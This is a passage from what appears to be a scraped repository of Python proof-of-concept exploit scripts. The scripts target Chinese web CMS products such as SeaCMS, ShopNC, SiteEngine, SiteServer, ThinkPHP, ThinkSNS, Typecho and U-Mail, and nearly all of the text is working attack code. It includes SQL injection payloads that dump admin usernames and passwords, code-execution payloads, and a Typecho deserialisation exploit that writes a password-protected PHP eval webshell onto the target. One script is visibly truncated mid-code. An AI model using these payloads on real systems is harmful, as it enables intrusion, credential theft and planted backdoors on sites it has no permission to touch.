26 | post_data = "searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();"
27 | try:
28 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
29 | if r"Configuration File (php.ini) Path" in req.text:
30 | cprint("[+]存在seacms search.php 参数jq代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
31 | else:
32 | cprint("[-]不存在seacms_search_jq_code_exec漏洞", "white", "on_grey")
33 |
34 | except:
35 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
36 |
37 | if __name__ == "__main__":
38 | warnings.filterwarnings("ignore")
39 | testVuln = seacms_search_jq_code_exec_BaseVerify(sys.argv[1])
40 | testVuln.run()
41 |
--------------------------------------------------------------------------------
/pocs/shopex/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/shopex/__init__.py
--------------------------------------------------------------------------------
/pocs/shopex/shopex_phpinfo_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopex敏感信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0100121
6 | author: Lucifer
7 | description: 路径 app/dev/svinfo.php,打开后可看到服务器测评信息及phpinfo等相关敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class shopex_phpinfo_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
21 | }
22 | payload = "/app/dev/svinfo.php?phpinfo=true"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if r"Configuration File (php.ini) Path" in req.text:
28 | cprint("[+]存在shopex敏感信息泄露...(敏感信息)\tpayload: "+vulnurl, "green")
29 | else:
30 | cprint("[-]不存在shopex_phpinfo_disclosure漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = shopex_phpinfo_disclosure_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/shopnc/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/shopnc/__init__.py
--------------------------------------------------------------------------------
/pocs/shopnc/shopnc_index_class_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopNC B2B版 index.php SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0124172
6 | author: Lucifer
7 | description: 文件index.php中,参数class_id[1]存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class shopnc_index_class_id_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)And(Select/**/1/**/From(Select/**/Count(*),Concat((Select(Select(Select/**/Concat(0x7e,Md5(1234),0x7e)))From/**/information_schema.tables/**/limit/**/0,1),Floor(Rand(0)*2))x/**/From/**/Information_schema.tables/**/group/**/by/**/x)a)%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在shopNC B2B版 index.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在shopnc_index_class_id_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = shopnc_index_class_id_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/siteengine/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/siteengine/__init__.py
--------------------------------------------------------------------------------
/pocs/siteengine/siteengine_comments_module_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: SiteEngine 6.0 & 7.1 SQL注入漏洞
5 | referer: http://0day5.com/archives/135
6 | author: Lucifer
7 | description: 文件comments.php中,参数module存在SQL注入,管理后台:http://server/admin/
8 | 系统维护—> wap设置—> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) —>
9 | 确定—>马上浏览—>看图片属性即为一句话地址。
10 | '''
11 | import sys
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class siteengine_comments_module_sqli_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | payload = "/comments.php?id=1&module=news+m,boka_newsclass+c+WhErE+1=2+UniOn+sElEct+1,2,Group_Concat(username,0x7e,password,0x7e,Md5(1234), 0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+From+boka_members%23"
25 | vulnurl = self.url + payload
26 | try:
27 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
28 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
29 | cprint("[+]存在SiteEngine6.0 comments.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
30 | vulnurl = self.url + "/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+WhEre+1=2+UniOn+sElEct+1,2,Group_Concat(username, 0x7e, password, Md5(1234), 0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+From+boka_members%23"
31 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
32 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
33 | cprint("[+]存在SiteEngine7.0 comments.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
34 | vulnurl = self.url + "/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+WhEre+1=2+UniOn+sElEct+1,2,Group_Concat(username, 0x7e, password, Md5(1234), 0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+From+boka_members%23"
35 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
36 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
37 | cprint("[+]存在SiteEngine7.0 comments.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
38 | vulnurl = self.url + "/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+WhEre+1=2+UniOn+sElEct+1,2,Group_Concat(username, 0x7e, password, Md5(1234), 0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+From+boka_members%23"
39 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
40 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
41 | cprint("[+]存在SiteEngine7.0 comments.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
42 | else:
43 | cprint("[-]不存在siteengine_comments_module_sqli漏洞", "white", "on_grey")
44 |
45 | except:
46 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
47 |
48 | if __name__ == "__main__":
49 | warnings.filterwarnings("ignore")
50 | testVuln = siteengine_comments_module_sqli_BaseVerify(sys.argv[1])
51 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/siteserver/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/siteserver/__init__.py
--------------------------------------------------------------------------------
/pocs/siteserver/siteserver_UserNameCollection_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: siteserver3.6.4 user.aspx注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-043535
6 | author: Lucifer
7 | description: 文件/usercenter/platform/user.aspx中,参数UserNameCollection存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class siteserver_UserNameCollection_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20AnD%20ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIon>0--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"BBBMicrosoft" in req.text:
27 | cprint("[+]存在siteserver3.6.4 user.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在siteserver_UserNameCollection_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = siteserver_UserNameCollection_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/siteserver/siteserver_background_administrator_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: siteserver3.6.4 background_administrator.aspx注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-043645
6 | author: Lucifer
7 | description: 文件/siteserver/userRole/background_administrator.aspx中,参数UserNameCollection存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class siteserver_background_administrator_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/userRole/background_administrator.aspx?RoleName=%27AnD%20ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN>0--&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"BBBMicrosoft" in req.text:
27 | cprint("[+]存在siteserver3.6.4 background_administrator.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在siteserver_background_administrator_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = siteserver_background_administrator_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
38 |
--------------------------------------------------------------------------------
/pocs/siteserver/siteserver_background_keywordsFilting_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: siteserver3.6.4 background_keywordsFilting.aspx注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-043641
6 | author: Lucifer
7 | description: 文件/siteserver/bbs/background_keywordsFilting.aspx中,参数Keyword存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class siteserver_background_keywordsFilting_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27AnD%20ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN>0--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"BBBMicrosoft" in req.text:
27 | cprint("[+]存在siteserver3.6.4 background_keywordsFilting.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在siteserver_background_keywordsFilting_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = siteserver_background_keywordsFilting_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
38 |
--------------------------------------------------------------------------------
/pocs/siteserver/siteserver_background_log_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: siteserver3.6.4 background_log.aspx注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-043523
6 | author: Lucifer
7 | description: 文件/siteserver/service/background_taskLog.aspx中,参数Keyword存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class siteserver_background_log_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=20120101%27AnD/**/ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN>1/**/AnD%271%27=%271&DateTo=test"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"BBBMicrosoft" in req.text:
27 | cprint("[+]存在siteserver3.6.4 background_log.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在siteserver_background_log_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = siteserver_background_log_sqli_BaseVerify(sys.argv[1])
36 | testVuln.run()
37 |
--------------------------------------------------------------------------------
/pocs/siteserver/siteserver_background_taskLog_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: siteserver3.6.4 background_taskLog.aspx注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-043406
6 | author: Lucifer
7 | description: 文件/siteserver/service/background_taskLog.aspx中,参数Keyword存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class siteserver_background_taskLog_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/service/background_taskLog.aspx?Keyword=test%%27AnD%20@@VeRsIon=1%20AnD%202='1&DateFrom=&DateTo=&IsSuccess=All"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 500 and r"Microsoft" in req.text:
27 | cprint("[+]存在siteserver3.6.4 background_taskLog.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在siteserver_background_taskLog_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = siteserver_background_taskLog_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
38 |
--------------------------------------------------------------------------------
/pocs/thinkphp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/thinkphp/__init__.py
--------------------------------------------------------------------------------
/pocs/thinkphp/onethink_category_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Onethink 参数category SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2016-0176868
6 | author: Lucifer
7 | description: onethink是ThinkPHP的子版本的一种,漏洞位于Application/Home/Controller/ArticleController.class.php中,category数组存在bool型盲注入,
8 | 影响版本ThinkPHP 3.2.0和3.2.3
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class onethink_category_sqli_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | reqlst = []
21 | payload1 = [r"/index.php?c=article&a=index&category[0]==0))+and+1=1%23between&category[1]=a", r"/index.php?c=article&a=index&category[0]==0))+and+1=2%23between&category[1]=a"]
22 | for payload in payload1:
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, timeout=10, verify=False)
26 | reqlst.append(str(req.text))
27 | except:
28 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
29 | if len(reqlst[0]) != len(reqlst[1]) and r"分类不存在或被禁用" in reqlst[1]:
30 | cprint("[+]存在onethink3.2.0 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
31 |
32 | reqlst = []
33 | payload2 = [r"/index.php?c=article&a=index&category[0]==0+and+1=1%23between&category[1]=a", r"/index.php?c=article&a=index&category[0]==0+and+1=2%23between&category[1]=a"]
34 | for payload in payload2:
35 | vulnurl = self.url + payload
36 | try:
37 | req = requests.get(vulnurl, timeout=10, verify=False)
38 | reqlst.append(str(req.text))
39 |
40 | except:
41 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
42 | if len(reqlst[0]) != len(reqlst[1]) and r"分类不存在或被禁用" in reqlst[1]:
43 | cprint("[+]存在onethink3.2.3 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
44 | else:
45 | cprint("[-]不存在onethink_category_sqli漏洞", "white", "on_grey")
46 |
47 |
48 |
49 | if __name__ == "__main__":
50 | warnings.filterwarnings("ignore")
51 | testVuln = onethink_category_sqli_BaseVerify(sys.argv[1])
52 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/thinkphp/thinkphp_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: ThinkPHP 代码执行漏洞
5 | referer: http://zone.wooyun.org/index.php?do=view&id=44
6 | author: Lucifer
7 | description: ThinkPHP 版本3.0~3.1开启Lite模式后preg_replace使用了/e选项,同时第二个参数使用双引号,所以造成了代码执行,可直接GETSHELL
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class thinkphp_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"Configuration File (php.ini) Path" in req.text:
25 | cprint("[+]存在ThinkPHP 代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
26 | else:
27 | cprint("[-]不存在thinkphp_code_exec漏洞", "white", "on_grey")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = thinkphp_code_exec_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/thinkphp/thinkphp_v5_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: ThinkPHP V5代码执行漏洞
5 | referer: https://iaq.pw/archives/106
6 | author: Lucifer
7 | description: ThinkPHP V5.x代码执行漏洞
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class thinkphp_v5_exec_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def extract_controller(self, url):
20 | urls = list()
21 | req = requests.get(self.url, timeout=10, verify=False)
22 | pattern = '可能不存在漏洞", "cyan")
45 |
46 | if __name__ == "__main__":
47 | warnings.filterwarnings("ignore")
48 | testVuln = thinkphp_v5_exec_BaseVerify(sys.argv[1])
49 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/thinksns/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/thinksns/__init__.py
--------------------------------------------------------------------------------
/pocs/thinksns/thinksns_category_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: thinksns category模块代码执行
5 | referer: Arice
6 | author: Lucifer,Arice
7 | description: 过滤不严导致的代码执行
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class thinksns_category_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id%5Btask_to_run%5D=addons/Area)->getAreaList();phpinfo();%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Configuration File (php.ini) Path" in req.text:
27 | cprint("[+]存在thinksns category模块代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在thinksns_category_code_exec漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = thinksns_category_code_exec_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/typecho/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/typecho/__init__.py
--------------------------------------------------------------------------------
/pocs/typecho/typecho_install_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: typecho install.php反序列化命令执行
5 | referer: http://p0sec.net/index.php/archives/114/
6 | author: Lucifer
7 | description: 漏洞产生在install.php中,base64后的值被反序列化和实例化后发生命令执行。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class typecho_install_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
21 | "Cookie":"__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTY6ImZpbGVfcHV0X2NvbnRlbnRzKCdkYS5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbcHBdKTs/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo3OiJ0eXBlY2hvIjt9",
22 | "Referer":self.url + "/install.php",
23 | "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
24 | "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
25 | "Accept-Encoding":"gzip, deflate",
26 | }
27 | vulnurl = self.url + "/install.php?finish=1"
28 | try:
29 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
30 | shellpath = self.url + "/da.php"
31 | post_data ={
32 | "pp":"phpinfo();"
33 | }
34 | req1 = requests.post(self.url + "/da.php", data=post_data, headers=headers, timeout=10, verify=False)
35 | if r"Configuration File (php.ini) Path" in req1.text:
36 | cprint("[+]存在typecho install.php反序列化命令执行漏洞...(高危)\tpayload: "+vulnurl+"\tshell地址: "+shellpath+"\t密码: pp", "red")
37 | else:
38 | cprint("[-]不存在typecho_install_code_exec漏洞", "white", "on_grey")
39 |
40 | except:
41 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
42 |
43 | if __name__ == "__main__":
44 | warnings.filterwarnings("ignore")
45 | testVuln = typecho_install_code_exec_BaseVerify(sys.argv[1])
46 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/umail/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/umail/__init__.py
--------------------------------------------------------------------------------
/pocs/umail/umail_physical_path.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: umail物理路径泄露
5 | referer: unknow
6 | author: Lucifer
7 | description: 泄露了物理路径。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class umail_physical_path_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def get_path(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/webmail/client/mail/module/test.php"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | temp=re.search(r'a non-object in (.*)\\client\\mail',req.text,re.S).group(1)
28 | temp=temp.split('\\')
29 | path=''
30 | for i in range(len(temp)):
31 | t=temp[i]+'/'
32 | path+=t
33 | return path
34 | except:
35 | return False
36 |
37 | def run(self):
38 | path = self.get_path()
39 | if path != False:
40 | cprint("[+]存在umail物理路径泄露...(敏感信息)\t真实路径: "+path, "green")
41 |
42 |
43 | if __name__ == "__main__":
44 | warnings.filterwarnings("ignore")
45 | testVuln = umail_physical_path_BaseVerify(sys.argv[1])
46 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/umail/umail_sessionid_access.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: U-Mail邮件系统sessionid访问
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-093049
6 | author: Lucifer
7 | description: 该邮件系统存在任意用户登录、且存在注入,从而可以无限制完美getshell(getshell过程只需简单三个请求)。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class umail_sessionid_access_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
22 | }
23 | payload = "/webmail/fast/index.php?module=operate&action=login"
24 | post_data = {
25 | "mailbox":"test@domain.com",
26 | "link":"?"
27 | }
28 | vulnurl = self.url + payload
29 | try:
